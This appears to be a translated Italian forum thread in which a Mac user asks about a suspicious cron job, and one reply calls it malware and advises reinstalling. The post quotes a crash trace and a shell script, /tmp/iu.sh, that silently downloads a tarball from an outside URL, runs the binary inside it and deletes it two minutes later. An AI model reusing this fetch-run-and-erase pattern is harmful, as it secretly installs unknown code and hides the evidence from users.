Cron mail notifica l'errore di uno script sconosciuto sospetto

0

Grazie alla funzione mail del Terminale mi è venuto in mente che c'era un qualche tipo di cron job in esecuzione con alcuni errori.

La mail del cron fornisce queste informazioni:

2018-08-02 23:47:22.698 xSf[717:27543] *** Terminating app due to uncaught exception 'NSInvalidArgumentException', reason: '*** -[_NSPlaceholderData initWithBase64EncodedString:options:]: nil string argument'
*** First throw call stack:
(
    0   CoreFoundation                      0x00007fff57d622db __exceptionPreprocess + 171
    1   libobjc.A.dylib                     0x00007fff7eeffc76 objc_exception_throw + 48
    2   CoreFoundation                      0x00007fff57df3d7d +[NSException raise:format:] + 205
    3   Foundation                          0x00007fff59e028ee -[NSData(NSData) initWithBase64EncodedString:options:] + 84
    4   xSf                                 0x000000010b54fd19 INJECTOR_decryptData_RNCryptor + 121
    5   xSf                                 0x000000010b55010a -[l196gKNh f27WaC8u:path:] + 410
    6   xSf                                 0x000000010b54ff2e -[l196gKNh s7PJWuXO:] + 158
    7   xSf                                 0x000000010b552cd1 main + 225
    8   libdyld.dylib                       0x00007fff7fb19015 start + 1
)
libc++abi.dylib: terminating with uncaught exception of type NSException
/tmp/iu.sh: line 6:   717 Abort trap: 6           ./xSf

Sembra che questo sia stato eseguito da alcuni script situati in: ~/Library/sandastros.np/sandastros.np di cui non riesco a leggere o decifrare il contenuto.

Ho controllato lo script che si trova in /tmp/iu.sh che contiene quanto segue:

#!/bin/bash
/usr/bin/curl -s -L -o /var/tmp/xSf.tgz "https://s3.amazonaws.com/xsfer/xSf.tgz"
mkdir -p /var/tmp/xSf
tar -xzf /var/tmp/xSf.tgz -C /var/tmp/xSf/
cd /var/tmp/xSf/
./xSf

func_cccc(){
sleep 120
rm -rf /var/tmp/xSf
rm -rf /var/tmp/xSf.tgz
}
func_cccc &

Questo URL è raggiungibile ma non volevo scaricare e aprire il file tar. Le autorizzazioni della cartella /tmp sono impostate correttamente, anche se iu.sh ha il mio utente come proprietario, quindi sembra consentire l'installazione di qualsiasi cosa possa averle fornito le autorizzazioni.

Qualche indizio su cosa sia questo?

    
posta Dez 04.08.2018 - 14:23
fonte

1 risposta

2

Sembra molto un qualche tipo di malware.

Se non sai da dove provengono xSF e sandastros.np, ritengo che il computer sia compromesso e faccia un formato completo e reinstallato.

    
risposta data 04.08.2018 - 14:57
fonte

Leggi altre domande sui tag